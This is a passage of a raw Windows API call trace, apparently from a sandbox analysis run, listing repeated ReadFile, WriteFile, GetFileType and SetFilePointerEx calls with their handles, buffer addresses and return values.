_get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] GetFileType (hFile=0x50) returned 0x1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] GetFileType (hFile=0x50) returned 0x1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] GetFileType (hFile=0x50) returned 0x1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.746] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.746] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.746] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.746] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] GetFileType (hFile=0x50) returned 0x1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] GetFileType (hFile=0x50) returned 0x1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] GetFileType (hFile=0x50) returned 0x1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] GetFileType (hFile=0x50) returned 0x1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] GetFileType (hFile=0x50) returned 0x1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] GetFileType (hFile=0x50) returned 0x1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] GetFileType (hFile=0x50) returned 0x1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] GetFileType (hFile=0x50) returned 0x1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.747] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.747] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.748] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.748] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] GetFileType (hFile=0x50) returned 0x1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] GetFileType (hFile=0x50) returned 0x1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] GetFileType (hFile=0x50) returned 0x1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] GetFileType (hFile=0x50) returned 0x1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] GetFileType (hFile=0x50) returned 0x1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] GetFileType (hFile=0x50) returned 0x1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.749] GetFileType (hFile=0x50) returned 0x1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.749] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.749] GetFileType (hFile=0x50) returned 0x1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.749] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.749] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.749] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.749] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.749] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.749] GetFileType (hFile=0x50) returned 0x1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.749] GetFileType (hFile=0x50) returned 0x1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.749] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.749] GetFileType (hFile=0x50) returned 0x1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.749] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] GetFileType (hFile=0x50) returned 0x1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] GetFileType (hFile=0x50) returned 0x1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] GetFileType (hFile=0x50) returned 0x1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] GetFileType (hFile=0x50) returned 0x1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] GetFileType (hFile=0x50) returned 0x1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.750] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.750] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.750] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.751] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] GetFileType (hFile=0x50) returned 0x1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] GetFileType (hFile=0x50) returned 0x1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] GetFileType (hFile=0x50) returned 0x1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] GetFileType (hFile=0x50) returned 0x1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] GetFileType (hFile=0x50) returned 0x1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] GetFileType (hFile=0x50) returned 0x1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.752] GetFileType (hFile=0x50) returned 0x1 [0227.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.752] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.752] GetFileType (hFile=0x50) returned 0x1 [0227.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.752] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.752] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.752] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.752] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.752] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.752] GetFileType (hFile=0x50) returned 0x1 [0227.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.752] GetFileType (hFile=0x50) returned 0x1 [0227.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.752] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] GetFileType (hFile=0x50) returned 0x1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] GetFileType (hFile=0x50) returned 0x1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] GetFileType (hFile=0x50) returned 0x1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] GetFileType (hFile=0x50) returned 0x1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] GetFileType (hFile=0x50) returned 0x1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.754] GetFileType (hFile=0x50) returned 0x1 [0227.754] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.754] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.754] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.754] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.754] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.754] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.754] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.754] GetFileType (hFile=0x50) returned 0x1 [0227.754] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.754] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.754] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.756] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.756] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.756] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.756] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.756] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.756] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.756] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.756] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] 